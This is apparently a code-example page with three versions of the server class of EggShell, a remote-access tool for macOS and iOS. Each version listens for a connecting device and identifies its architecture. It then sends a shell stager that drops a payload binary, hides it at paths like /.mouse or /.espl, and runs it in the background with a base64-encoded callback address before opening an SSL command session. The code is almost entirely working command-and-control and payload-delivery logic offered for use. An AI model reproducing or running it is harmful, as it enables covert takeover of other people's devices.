Beispiel #1
0
 def __init__(self):
     if not os.path.isdir("downloads"):
         os.makedirs("downloads")
     self.macos_architectures = ["i386"]
     self.ios_architectures = ["arm64","armv7s", "arm"]
     self.host = None
     self.port = None
     self.debug = False
     self.is_multi = False
     self.modules_macos = self.import_modules("modules/commands/macOS")
     self.modules_ios = self.import_modules("modules/commands/iOS")
     self.modules_local = self.import_modules("modules/commands/local")
     self.modules_universal = self.import_modules("modules/commands/universal")
     self.multihandler = MultiHandler(self)
Beispiel #2
0
class Server:
    def __init__(self):
        if not os.path.isdir("downloads"):
            os.makedirs("downloads")
        self.macos_architectures = ["i386"]
        self.ios_architectures = ["arm64", "armv7s", "arm"]
        self.host = None
        self.port = None
        self.sos = None
        self.debug = False
        self.is_multi = False
        self.modules_macos = self.import_modules("core/commands/macos")
        self.modules_ios = self.import_modules("core/commands/ios")
        self.modules_local = self.import_modules("core/commands/local")
        self.modules_universal = self.import_modules("core/commands/universal")
        self.multihandler = MultiHandler(self)

    def import_modules(self, path):
        sys.path.append(path)
        modules = dict()
        for mod in os.listdir(path):
            if mod == '__init__.py' or mod[-3:] != '.py':
                continue
            else:
                m = __import__(mod[:-3]).command()
                #add module info to dictionary
                modules[m.name] = m
        return modules

    def get_modules(self, device_type):
        if device_type == "macos":
            result = self.modules_macos
            self.sos = "macOS"
        elif device_type == "iOS":
            result = self.modules_ios
            self.sos = "iOS"
        result.update(self.modules_universal)
        return result

    def set_host_port(self):
        try:
            lhost = h.getip()
            lport = None
            choice = raw_input(h.info_general_raw("Local Host: "))
            if choice != "":
                lhost = choice
            while True:
                lport = raw_input(h.info_general_raw("Local Port: "))
                if not lport:
                    lport = 4444
                try:
                    lport = int(lport)
                except ValueError:
                    h.info_error("Invalid port, please enter a valid integer.")
                    continue
                if lport < 1024:
                    h.info_error("Invalid port, please enter a value >= 1024.")
                    continue
                break
            h.info_general("Using " + lhost + ":" + str(lport) + "...")
            self.host = socket.gethostbyname(lhost)
            self.port = lport
            return True
        except KeyboardInterrupt:
            return

    def verbose_print(self, text):
        if self.is_multi == False:
            h.info_general(text)

    def debug_print(self, text):
        if self.debug:
            h.info_warning(text)

    def start_single_handler(self):
        session = self.listen_for_stager()
        if session:
            session.interact()

    def start_multi_handler(self):
        os.system("printf '\033]2;MultiHandler CLI\a'")
        self.multihandler.start_background_server()
        self.multihandler.interact()
        print ""

    def craft_payload(self, device_arch):
        # TODO: Detect uid before we send executable
        if not self.host:
            h.info_error("Local Host is not set!")
            return
        if not self.port:
            h.info_error("Local Port is not set!")
            return
        payload_parameter = h.b64(
            json.dumps({
                "ip": self.host,
                "port": self.port,
                "debug": self.debug
            }))
        if device_arch in self.macos_architectures:
            self.verbose_print("Connecting to macOS...")
            self.verbose_print("Sending macOS Payload...")
            f = open("data/payloads/macos", "rb")
            payload = f.read()
            f.close()
            #save to tmp,
            instructions = \
            "cat >/private/tmp/mouse;"+\
            "chmod 777 /private/tmp/mouse;"+\
            "/private/tmp/mouse "+payload_parameter+" 2>/dev/null &\n"
            self.verbose_print("Executing macOS Payload...")
            return (instructions, payload)
        elif device_arch in self.ios_architectures:
            self.verbose_print("Connecting to iOS...")
            self.verbose_print("Sending iOS Payload...")
            f = open("data/payloads/ios", "rb")
            payload = f.read()
            f.close()
            instructions = \
            "cat >/tmp/mouse;"+\
            "chmod 777 /tmp/mouse;"+\
            "mv /tmp/mouse /.mouse;"+\
            "/.mouse "+payload_parameter+" 2>/dev/null &\n"
            self.verbose_print("Executing iOS Payload...")
            return (instructions, payload)
        else:
            h.info_error("The device is not recognized!")
            return

    def listen_for_stager(self):
        #craft shell script
        identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n'

        #listen for connection
        s = socket.socket()
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(('0.0.0.0', self.port))
        s.listen(1)
        self.verbose_print("Listening on port " + str(self.port) + "...")
        try:
            conn, addr = s.accept()
        except KeyboardInterrupt:
            s.close()
            return

        # identify device
        hostAddress = addr[0]
        self.verbose_print("Connecting to " + hostAddress + "...")
        conn.send(identification_shell_command)
        device_arch = conn.recv(128).strip()
        if not device_arch:
            return

        # send bash stager
        try:
            bash_stager, executable = self.craft_payload(device_arch)
        except Exception as e:
            raw_input("Press enter to continue...")
            return
        self.debug_print(bash_stager.strip())
        conn.send(bash_stager)

        # send executable
        conn.send(executable)
        conn.close()
        self.verbose_print("Establishing Connection...")

        try:
            return self.listen_for_executable_payload(s)
        except ssl.SSLError as e:
            h.info_error("SSL error: " + str(e))
            return
        except Exception as e:
            h.info_error("Error: " + str(e))
            return

    def listen_for_executable_payload(self, s):
        # accept connection
        ssl_con, hostAddress = s.accept()
        s.settimeout(5)
        ssl_sock = ssl.wrap_socket(ssl_con,
                                   server_side=True,
                                   certfile=".keys/server.crt",
                                   keyfile=".keys/server.key",
                                   ssl_version=ssl.PROTOCOL_SSLv23)
        raw = ssl_sock.recv(256)
        device_info = json.loads(raw)
        return session.Session(self, ssl_sock, device_info)

    def update_session(self, old_session):
        new_session = self.listen_for_stager()
        old_session.conn = new_session.conn
        old_session.hostname = new_session.hostname
        old_session.username = new_session.username
        old_session.type = new_session.type
Beispiel #3
0
class Server:
    def __init__(self):
        if not os.path.isdir("downloads"):
            os.makedirs("downloads")
        self.macos_architectures = ["i386"]
        self.ios_architectures = ["arm64", "armv7s"]
        self.host = None
        self.port = None
        self.debug = False
        self.is_multi = False
        self.modules_macos = self.import_modules("modules/commands/macOS")
        self.modules_ios = self.import_modules("modules/commands/iOS")
        self.modules_local = self.import_modules("modules/commands/local")
        self.modules_universal = self.import_modules(
            "modules/commands/universal")
        self.multihandler = MultiHandler(self)

    def import_modules(self, path):
        sys.path.append(path)
        modules = dict()
        for mod in os.listdir(path):
            if mod == '__init__.py' or mod[-3:] != '.py':
                continue
            else:
                m = __import__(mod[:-3]).command()
                #add module info to dictionary
                modules[m.name] = m
        return modules

    def get_modules(self, device_type):
        if device_type == "macos":
            result = self.modules_macos
        elif device_type == "iOS":
            result = self.modules_ios
        else:
            return self.modules_universal

        result.update(self.modules_universal)
        return result

    def set_host_port(self):
        try:
            lhost = h.getip()
            lport = None
            choice = raw_input(
                h.info_general_raw("SET LHOST (Leave blank for " + lhost +
                                   ")>"))
            if choice != "":
                lhost = choice
            h.info_general("LHOST = " + lhost)
            while True:
                lport = raw_input(
                    h.info_general_raw("SET LPORT (Leave blank for 4444)>"))
                if not lport:
                    lport = 4444
                try:
                    lport = int(lport)
                except ValueError:
                    h.info_general(
                        "invalid port, please enter a valid integer")
                    continue
                if lport < 1024:
                    h.info_general(
                        "invalid port, please enter a value >= 1024")
                    continue
                break
            h.info_general("LPORT = " + str(lport))
            self.host = socket.gethostbyname(lhost)
            self.port = lport
            return True
        except KeyboardInterrupt:
            return

    def verbose_print(self, text):
        if self.is_multi == False:
            h.info_general(text)

    def debug_print(self, text):
        if self.debug:
            h.info_warning(text)

    def start_single_handler(self):
        session = self.listen_for_stager()
        if session:
            session.interact()

    def start_multi_handler(self):
        self.multihandler.start_background_server()
        self.multihandler.interact()
        print "end start multihandler"

    def craft_payload(self, device_arch):
        # TODO: Detect uid before we send executable
        if not self.host:
            raise ValueError('Server host not set')
        if not self.port:
            raise ValueError('Server port not set')
        payload_parameter = h.b64(
            json.dumps({
                "ip": self.host,
                "port": self.port,
                "debug": self.debug
            }))
        if device_arch in self.macos_architectures:
            self.verbose_print("Detected macOS")
            f = open("resources/esplmacos", "rb")
            payload = f.read()
            f.close()
            #save to tmp,
            instructions = \
            "cat >/private/tmp/tmpespl;"+\
            "chmod 777 /private/tmp/tmpespl;"+\
            "mv /private/tmp/tmpespl /private/tmp/espl;"+\
            "/private/tmp/espl "+payload_parameter+" 2>/dev/null &\n"
            return (instructions, payload)
        elif device_arch in self.ios_architectures:
            self.verbose_print("Detected iOS")
            f = open("resources/esplios", "rb")
            payload = f.read()
            f.close()
            instructions = \
            "cat >/tmp/tmpespl;"+\
            "chmod 777 /tmp/tmpespl;"+\
            "mv /tmp/tmpespl /.espl;"+\
            "/.espl "+payload_parameter+" 2>/dev/null &\n"
            return (instructions, payload)
        else:
            if device_arch == "Linux":
                self.verbose_print("Detected Linux")
            elif "GET / HTTP/1.1" in device_arch:
                raise ValueError(
                    "EggShell does not exploit safari, it is a payload creation tool.\nPlease look at the README.md file"
                )
            else:
                h.info_general("Device unrecognized, trying python payload")
            f = open("resources/espl.py", "rb")
            payload = f.read()
            f.close()
            instructions = \
            "cat >/tmp/espl.py;"+\
            "chmod 777 /var/tmp/espl.py;"+\
            "python /tmp/espl.py "+payload_parameter+" &\n"
            return (instructions, payload)

    def listen_for_stager(self):
        #craft shell script
        identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n'

        #listen for connection
        s = socket.socket()
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(('0.0.0.0', self.port))
        s.listen(1)
        self.verbose_print("Listening on port " + str(self.port) + "...")
        try:
            conn, addr = s.accept()
        except KeyboardInterrupt:
            s.close()
            return

        # identify device
        hostAddress = addr[0]
        self.verbose_print("Connecting to " + hostAddress)
        conn.send(identification_shell_command)
        device_arch = conn.recv(128).strip()
        if not device_arch:
            return

        # send bash stager
        try:
            bash_stager, executable = self.craft_payload(device_arch)
        except Exception as e:
            h.info_error(str(e))
            raw_input("Press the enter key to continue")
            return
        self.verbose_print("Sending Payload")
        self.debug_print(bash_stager.strip())
        conn.send(bash_stager)

        # send executable
        self.debug_print("Sending Executable")
        conn.send(executable)
        conn.close()
        self.verbose_print("Establishing Secure Connection...")

        try:
            return self.listen_for_executable_payload(s)
        except ssl.SSLError as e:
            h.info_error("SSL error: " + str(e))
            return
        except Exception as e:
            h.info_error("Error: " + str(e))
            return

    def listen_for_executable_payload(self, s):
        # accept connection
        ssl_con, hostAddress = s.accept()
        s.settimeout(5)
        ssl_sock = ssl.wrap_socket(ssl_con,
                                   server_side=True,
                                   certfile=".keys/server.crt",
                                   keyfile=".keys/server.key",
                                   ssl_version=ssl.PROTOCOL_SSLv23)
        raw = ssl_sock.recv(256)
        device_info = json.loads(raw)
        return session.Session(self, ssl_sock, device_info)

    def update_session(self, old_session):
        new_session = self.listen_for_stager()
        old_session.conn = new_session.conn
        old_session.hostname = new_session.hostname
        old_session.username = new_session.username
        old_session.type = new_session.type